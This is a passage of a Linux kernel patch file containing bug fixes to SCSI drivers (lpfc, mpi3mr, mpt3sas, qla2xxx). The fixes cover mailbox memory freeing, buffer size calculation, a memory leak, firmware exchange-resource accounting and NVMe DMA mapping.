+ 				  &wr_object->u.response);
+ 	}
+ 
+-	if (!phba->sli4_hba.intr_enable)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+-	else if (rc != MBX_TIMEOUT)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+ 	if (shdr_status || shdr_add_status || shdr_add_status_2 || rc) {
+ 		lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+ 				"3025 Write Object mailbox failed with "
+@@ -20904,6 +20905,12 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 		lpfc_log_fw_write_cmpl(phba, shdr_status, shdr_add_status,
+ 				       shdr_add_status_2, shdr_change_status,
+ 				       shdr_csf);
++
++	if (!phba->sli4_hba.intr_enable)
++		mempool_free(mbox, phba->mbox_mem_pool);
++	else if (mbox_status != MBX_TIMEOUT)
++		mempool_free(mbox, phba->mbox_mem_pool);
++
+ 	return rc;
+ }
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 9baac224b2135..bff6377023979 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -293,7 +293,6 @@ out:
+ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	struct bsg_job *job)
+ {
+-	long rval = -EINVAL;
+ 	u16 num_devices = 0, i = 0, size;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev;
+@@ -304,7 +303,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	if (job->request_payload.payload_len < sizeof(u32)) {
+ 		dprint_bsg_err(mrioc, "%s: invalid size argument\n",
+ 		    __func__);
+-		return rval;
++		return -EINVAL;
+ 	}
+ 
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+@@ -312,7 +311,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		num_devices++;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	if ((job->request_payload.payload_len == sizeof(u32)) ||
++	if ((job->request_payload.payload_len <= sizeof(u64)) ||
+ 		list_empty(&mrioc->tgtdev_list)) {
+ 		sg_copy_from_buffer(job->request_payload.sg_list,
+ 				    job->request_payload.sg_cnt,
+@@ -320,14 +319,14 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		return 0;
+ 	}
+ 
+-	kern_entrylen = (num_devices - 1) * sizeof(*devmap_info);
+-	size = sizeof(*alltgt_info) + kern_entrylen;
++	kern_entrylen = num_devices * sizeof(*devmap_info);
++	size = sizeof(u64) + kern_entrylen;
+ 	alltgt_info = kzalloc(size, GFP_KERNEL);
+ 	if (!alltgt_info)
+ 		return -ENOMEM;
+ 
+ 	devmap_info = alltgt_info->dmi;
+-	memset((u8 *)devmap_info, 0xFF, (kern_entrylen + sizeof(*devmap_info)));
++	memset((u8 *)devmap_info, 0xFF, kern_entrylen);
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+ 	list_for_each_entry(tgtdev, &mrioc->tgtdev_list, list) {
+ 		if (i < num_devices) {
+@@ -344,25 +343,18 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	num_devices = i;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	memcpy(&alltgt_info->num_devices, &num_devices, sizeof(num_devices));
++	alltgt_info->num_devices = num_devices;
+ 
+-	usr_entrylen = (job->request_payload.payload_len - sizeof(u32)) / sizeof(*devmap_info);
++	usr_entrylen = (job->request_payload.payload_len - sizeof(u64)) /
++		sizeof(*devmap_info);
+ 	usr_entrylen *= sizeof(*devmap_info);
+ 	min_entrylen = min(usr_entrylen, kern_entrylen);
+-	if (min_entrylen && (!memcpy(&alltgt_info->dmi, devmap_info, min_entrylen))) {
+-		dprint_bsg_err(mrioc, "%s:%d: device map info copy failed\n",
+-		    __func__, __LINE__);
+-		rval = -EFAULT;
+-		goto out;
+-	}
+ 
+ 	sg_copy_from_buffer(job->request_payload.sg_list,
+ 			    job->request_payload.sg_cnt,
+-			    alltgt_info, job->request_payload.payload_len);
+-	rval = 0;
+-out:
++			    alltgt_info, (min_entrylen + sizeof(u64)));
+ 	kfree(alltgt_info);
+-	return rval;
++	return 0;
+ }
+ /**
+  * mpi3mr_get_change_count - Get topology change count
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 3306de7170f64..6eaeba41072cb 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -4952,6 +4952,10 @@ mpi3mr_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		mpi3mr_init_drv_cmd(&mrioc->dev_rmhs_cmds[i],
+ 		    MPI3MR_HOSTTAG_DEVRMCMD_MIN + i);
+ 
++	for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
++		mpi3mr_init_drv_cmd(&mrioc->evtack_cmds[i],
++				    MPI3MR_HOSTTAG_EVTACKCMD_MIN + i);
++
+ 	if (pdev->revision)
+ 		mrioc->enable_segqueue = true;
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 69061545d9d2f..2ee9ea57554d7 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -5849,6 +5849,9 @@ _base_release_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 		}
+ 		dma_pool_destroy(ioc->pcie_sgl_dma_pool);
+ 	}
++	kfree(ioc->pcie_sg_lookup);
++	ioc->pcie_sg_lookup = NULL;
++
+ 	if (ioc->config_page) {
+ 		dexitprintk(ioc,
+ 			    ioc_info(ioc, "config_page(0x%p): free\n",
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index cd75b179410d7..dba7bba788d76 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -278,8 +278,8 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 	const char *type;
+ 	int req_sg_cnt, rsp_sg_cnt;
+ 	int rval =  (DID_ERROR << 16);
+-	uint16_t nextlid = 0;
+ 	uint32_t els_cmd = 0;
++	int qla_port_allocated = 0;
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
+@@ -329,9 +329,9 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 		/* make sure the rport is logged in,
+ 		 * if not perform fabric login
+ 		 */
+-		if (qla2x00_fabric_login(vha, fcport, &nextlid)) {
++		if (atomic_read(&fcport->state) != FCS_ONLINE) {
+ 			ql_dbg(ql_dbg_user, vha, 0x7003,
+-			    "Failed to login port %06X for ELS passthru.\n",
++			    "Port %06X is not online for ELS passthru.\n",
+ 			    fcport->d_id.b24);
+ 			rval = -EIO;
+ 			goto done;
+@@ -348,6 +348,7 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 			goto done;
+ 		}
+ 
++		qla_port_allocated = 1;
+ 		/* Initialize all required  fields of fcport */
+ 		fcport->vha = vha;
+ 		fcport->d_id.b.al_pa =
+@@ -432,7 +433,7 @@ done_unmap_sg:
+ 	goto done_free_fcport;
+ 
+ done_free_fcport:
+-	if (bsg_request->msgcode != FC_BSG_RPT_ELS)
++	if (qla_port_allocated)
+ 		qla2x00_free_fcport(fcport);
+ done:
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index a26a373be9da3..cd4eb11b07079 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -660,7 +660,7 @@ enum {
+ 
+ struct iocb_resource {
+ 	u8 res_type;
+-	u8 pad;
++	u8  exch_cnt;
+ 	u16 iocb_cnt;
+ };
+ 
+@@ -3721,6 +3721,10 @@ struct qla_fw_resources {
+ 	u16 iocbs_limit;
+ 	u16 iocbs_qp_limit;
+ 	u16 iocbs_used;
++	u16 exch_total;
++	u16 exch_limit;
++	u16 exch_used;
++	u16 pad;
+ };
+ 
+ #define QLA_IOCB_PCT_LIMIT 95
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index 777808af56347..1925cc6897b68 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -235,7 +235,7 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	uint16_t mb[MAX_IOCB_MB_REG];
+ 	int rc;
+ 	struct qla_hw_data *ha = vha->hw;
+-	u16 iocbs_used, i;
++	u16 iocbs_used, i, exch_used;
+ 
+ 	rc = qla24xx_res_count_wait(vha, mb, SIZEOF_IOCB_MB_REG);
+ 	if (rc != QLA_SUCCESS) {
+@@ -263,13 +263,19 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	if (ql2xenforce_iocb_limit) {
+ 		/* lock is not require. It's an estimate. */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
++		exch_used = ha->base_qpair->fwres.exch_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+-			if (ha->queue_pair_map[i])
++			if (ha->queue_pair_map[i]) {
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++			}
+ 		}
+ 
+ 		seq_printf(s, "Driver: estimate iocb used [%d] high water limit [%d]\n",
+ 			   iocbs_used, ha->base_qpair->fwres.iocbs_limit);
++
++		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
++			   exch_used, ha->base_qpair->fwres.exch_limit);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index e4240aae5f9e3..38d5bda1f2748 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -925,7 +925,9 @@ qla_edif_app_getfcinfo(scsi_qla_host_t *vha, struct bsg_job *bsg_job)
+ 			if (!(fcport->flags & FCF_FCSP_DEVICE))
+ 				continue;
+ 
+-			tdid = app_req.remote_pid;
++			tdid.b.domain = app_req.remote_pid.domain;
++			tdid.b.area = app_req.remote_pid.area;
++			tdid.b.al_pa = app_req.remote_pid.al_pa;
+ 
+ 			ql_dbg(ql_dbg_edif, vha, 0x2058,
+ 			    "APP request entry - portid=%06x.\n", tdid.b24);
+@@ -2989,9 +2991,10 @@ qla28xx_start_scsi_edif(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -3185,7 +3188,7 @@ queuing_error:
+ 		mempool_free(sp->u.scmd.ct6_ctx, ha->ctx_mempool);
+ 		sp->u.scmd.ct6_ctx = NULL;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+diff --git a/drivers/scsi/qla2xxx/qla_edif_bsg.h b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+index 0931f4e4e127a..514c265ba86e2 100644
+--- a/drivers/scsi/qla2xxx/qla_edif_bsg.h
++++ b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+@@ -89,7 +89,20 @@ struct app_plogi_reply {
+ struct app_pinfo_req {
+ 	struct app_id app_info;
+ 	uint8_t	 num_ports;
+-	port_id_t remote_pid;
++	struct {
++#ifdef __BIG_ENDIAN
++		uint8_t domain;
++		uint8_t area;
++		uint8_t al_pa;
++#elif defined(__LITTLE_ENDIAN)
++		uint8_t al_pa;
++		uint8_t area;
++		uint8_t domain;
++#else
++#error "__BIG_ENDIAN or __LITTLE_ENDIAN must be defined!"
++#endif
++		uint8_t rsvd_1;
++	} remote_pid;
+ 	uint8_t		version;
+ 	uint8_t		pad[VND_CMD_PAD_SIZE];
+ 	uint8_t		reserved[VND_CMD_APP_RESERVED_SIZE];
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 8d9ecabb1aac1..8f2a968793913 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -128,12 +128,14 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 		    sp->cmd_sp)) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			cmdsp_found = 1;
++			qla_put_fw_resources(qpair, &sp->cmd_sp->iores);
+ 		}
+ 
+ 		/* removing the abort */
+ 		if (qpair->req->outstanding_cmds[handle] == sp) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			sp_found = 1;
++			qla_put_fw_resources(qpair, &sp->iores);
+ 			break;
+ 		}
+ 	}
+@@ -2000,6 +2002,7 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 		for (h = 1; h < sp->qpair->req->num_outstanding_cmds; h++) {
+ 			if (sp->qpair->req->outstanding_cmds[h] == sp) {
+ 				sp->qpair->req->outstanding_cmds[h] = NULL;
++				qla_put_fw_resources(sp->qpair, &sp->iores);
+ 				break;
+ 			}
+ 		}
+@@ -2073,7 +2076,6 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ done_free_sp:
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+-	fcport->flags &= ~FCF_ASYNC_SENT;
+ done:
+ 	return rval;
+ }
+@@ -3943,6 +3945,12 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 	ha->base_qpair->fwres.iocbs_limit = limit;
+ 	ha->base_qpair->fwres.iocbs_qp_limit = limit / num_qps;
+ 	ha->base_qpair->fwres.iocbs_used = 0;
++
++	ha->base_qpair->fwres.exch_total = ha->orig_fw_xcb_count;
++	ha->base_qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
++					    QLA_IOCB_PCT_LIMIT) / 100;
++	ha->base_qpair->fwres.exch_used  = 0;
++
+ 	for (i = 0; i < ha->max_qpairs; i++) {
+ 		if (ha->queue_pair_map[i])  {
+ 			ha->queue_pair_map[i]->fwres.iocbs_total =
+@@ -3951,6 +3959,10 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 			ha->queue_pair_map[i]->fwres.iocbs_qp_limit =
+ 				limit / num_qps;
+ 			ha->queue_pair_map[i]->fwres.iocbs_used = 0;
++			ha->queue_pair_map[i]->fwres.exch_total = ha->orig_fw_xcb_count;
++			ha->queue_pair_map[i]->fwres.exch_limit =
++				(ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
++			ha->queue_pair_map[i]->fwres.exch_used = 0;
+ 		}
+ 	}
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index 5185dc5daf80d..b0ee307b5d4b9 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -380,24 +380,26 @@ qla2xxx_get_fc4_priority(struct scsi_qla_host *vha)
+ 
+ enum {
+ 	RESOURCE_NONE,
+-	RESOURCE_INI,
++	RESOURCE_IOCB = BIT_0,
++	RESOURCE_EXCH = BIT_1,  /* exchange */
++	RESOURCE_FORCE = BIT_2,
+ };
+ 
+ static inline int
+-qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+ 	u16 iocbs_used, i;
++	u16 exch_used;
+ 	struct qla_hw_data *ha = qp->vha->hw;
+ 
+ 	if (!ql2xenforce_iocb_limit) {
+ 		iores->res_type = RESOURCE_NONE;
+ 		return 0;
+ 	}
++	if (iores->res_type & RESOURCE_FORCE)
++		goto force;
+ 
+-	if ((iores->iocb_cnt + qp->fwres.iocbs_used) < qp->fwres.iocbs_qp_limit) {
+-		qp->fwres.iocbs_used += iores->iocb_cnt;
+-		return 0;
+-	} else {
++	if ((iores->iocb_cnt + qp->fwres.iocbs_used) >= qp->fwres.iocbs_qp_limit) {
+ 		/* no need to acquire qpair lock. It's just rough calculation */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+@@ -405,30 +407,49 @@ qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
+ 		}
+ 
+-		if ((iores->iocb_cnt + iocbs_used) < qp->fwres.iocbs_limit) {
+-			qp->fwres.iocbs_used += iores->iocb_cnt;
+-			return 0;
+-		} else {
++		if ((iores->iocb_cnt + iocbs_used) >= qp->fwres.iocbs_limit) {
++			iores->res_type = RESOURCE_NONE;
++			return -ENOSPC;
++		}
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		exch_used = ha->base_qpair->fwres.exch_used;
++		for (i = 0; i < ha->max_qpairs; i++) {
++			if (ha->queue_pair_map[i])
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++		}
++
++		if ((exch_used + iores->exch_cnt) >= qp->fwres.exch_limit) {
+ 			iores->res_type = RESOURCE_NONE;
+ 			return -ENOSPC;
+ 		}
+ 	}
++force:
++	qp->fwres.iocbs_used += iores->iocb_cnt;
++	qp->fwres.exch_used += iores->exch_cnt;
++	return 0;
+ }
+ 
+ static inline void
+-qla_put_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_put_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+-	switch (iores->res_type) {
+-	case RESOURCE_NONE:
+-		break;
+-	default:
++	if (iores->res_type & RESOURCE_IOCB) {
+ 		if (qp->fwres.iocbs_used >= iores->iocb_cnt) {
+ 			qp->fwres.iocbs_used -= iores->iocb_cnt;
+ 		} else {
+-			// should not happen
++			/* should not happen */
+ 			qp->fwres.iocbs_used = 0;
+ 		}
+-		break;
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		if (qp->fwres.exch_used >= iores->exch_cnt) {
++			qp->fwres.exch_used -= iores->exch_cnt;
++		} else {
++			/* should not happen */
++			qp->fwres.exch_used = 0;
++		}
+ 	}
+ 	iores->res_type = RESOURCE_NONE;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 42ce4e1fe7441..4f48f098ea5a6 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -1589,9 +1589,10 @@ qla24xx_start_scsi(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1678,7 +1679,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1793,9 +1794,10 @@ qla24xx_dif_start_scsi(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1883,7 +1885,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1952,9 +1954,10 @@ qla2xxx_start_scsi_mq(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2041,7 +2044,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -2171,9 +2174,10 @@ qla2xxx_dif_start_scsi_mq(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2260,7 +2264,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -3813,6 +3817,65 @@ qla24xx_prlo_iocb(srb_t *sp, struct logio_entry_24xx *logio)
+ 	logio->vp_index = sp->fcport->vha->vp_idx;
+ }
+ 
++int qla_get_iocbs_resource(struct srb *sp)
++{
++	bool get_exch;
++	bool push_it_through = false;
++
++	if (!ql2xenforce_iocb_limit) {
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++	}
++	sp->iores.res_type = RESOURCE_NONE;
++
++	switch (sp->type) {
++	case SRB_TM_CMD:
++	case SRB_PRLI_CMD:
++	case SRB_ADISC_CMD:
++		push_it_through = true;
++		fallthrough;
++	case SRB_LOGIN_CMD:
++	case SRB_ELS_CMD_RPT:
++	case SRB_ELS_CMD_HST:
++	case SRB_ELS_CMD_HST_NOLOGIN:
++	case SRB_CT_CMD:
++	case SRB_NVME_LS:
++	case SRB_ELS_DCMD:
++		get_exch = true;
++		break;
++
++	case SRB_FXIOCB_DCMD:
++	case SRB_FXIOCB_BCMD:
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++
++	case SRB_SA_UPDATE:
++	case SRB_SA_REPLACE:
++	case SRB_MB_IOCB:
++	case SRB_ABT_CMD:
++	case SRB_NACK_PLOGI:
++	case SRB_NACK_PRLI:
++	case SRB_NACK_LOGO:
++	case SRB_LOGOUT_CMD:
++	case SRB_CTRL_VP:
++		push_it_through = true;
++		fallthrough;
++	default:
++		get_exch = false;
++	}
++
++	sp->iores.res_type |= RESOURCE_IOCB;
++	sp->iores.iocb_cnt = 1;
++	if (get_exch) {
++		sp->iores.res_type |= RESOURCE_EXCH;
++		sp->iores.exch_cnt = 1;
++	}
++	if (push_it_through)
++		sp->iores.res_type |= RESOURCE_FORCE;
++
++	return qla_get_fw_resources(sp->qpair, &sp->iores);
++}
++
+ int
+ qla2x00_start_sp(srb_t *sp)
+ {
+@@ -3827,6 +3890,12 @@ qla2x00_start_sp(srb_t *sp)
+ 		return -EIO;
+ 
+ 	spin_lock_irqsave(qp->qp_lock_ptr, flags);
++	rval = qla_get_iocbs_resource(sp);
++	if (rval) {
++		spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++		return -EAGAIN;
++	}
++
+ 	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
+ 	if (!pkt) {
+ 		rval = EAGAIN;
+@@ -3927,6 +3996,8 @@ qla2x00_start_sp(srb_t *sp)
+ 	wmb();
+ 	qla2x00_start_iocbs(vha, qp->req);
+ done:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
+ 	return rval;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index e19fde304e5c6..cbbd7014da939 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -3112,6 +3112,7 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+@@ -3197,7 +3198,7 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 		}
+ 		return;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 
+ 	if (sp->cmd_type != TYPE_SRB) {
+ 		req->outstanding_cmds[handle] = NULL;
+@@ -3362,8 +3363,6 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 				       "Dropped frame(s) detected (0x%x of 0x%x bytes).\n",
+ 				       resid, scsi_bufflen(cp));
+ 
+-				vha->interface_err_cnt++;
+-
+ 				res = DID_ERROR << 16 | lscsi_status;
+ 				goto check_scsi_status;
+ 			}
+@@ -3618,7 +3617,6 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	default:
+ 		sp = qla2x00_get_sp_from_handle(vha, func, req, pkt);
+ 		if (sp) {
+-			qla_put_iocbs(sp->qpair, &sp->iores);
+ 			sp->done(sp, res);
+ 			return 0;
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 02fdeb0d31ec4..c57e02a355219 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -170,18 +170,6 @@ out:
+ 	qla2xxx_rel_qpair_sp(sp->qpair, sp);
+ }
+ 
+-static void qla_nvme_ls_unmap(struct srb *sp, struct nvmefc_ls_req *fd)
+-{
+-	if (sp->flags & SRB_DMA_VALID) {
+-		struct srb_iocb *nvme = &sp->u.iocb_cmd;
+-		struct qla_hw_data *ha = sp->fcport->vha->hw;
+-
+-		dma_unmap_single(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+-				 fd->rqstlen, DMA_TO_DEVICE);
+-		sp->flags &= ~SRB_DMA_VALID;
+-	}
+-}
+-
+ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ {
+ 	struct srb *sp = container_of(kref, struct srb, cmd_kref);
+@@ -199,7 +187,6 @@ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ 
+ 	fd = priv->fd;
+ 
+-	qla_nvme_ls_unmap(sp, fd);
+ 	fd->done(fd, priv->comp_status);
+ out:
+ 	qla2x00_rel_sp(sp);
+@@ -365,13 +352,10 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 	nvme->u.nvme.rsp_len = fd->rsplen;
+ 	nvme->u.nvme.rsp_dma = fd->rspdma;
+ 	nvme->u.nvme.timeout_sec = fd->timeout;
+-	nvme->u.nvme.cmd_dma = dma_map_single(&ha->pdev->dev, fd->rqstaddr,
+-	    fd->rqstlen, DMA_TO_DEVICE);
++	nvme->u.nvme.cmd_dma = fd->rqstdma;
+ 	dma_sync_single_for_device(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+ 	    fd->rqstlen, DMA_TO_DEVICE);
+ 
+-	sp->flags |= SRB_DMA_VALID;
+-
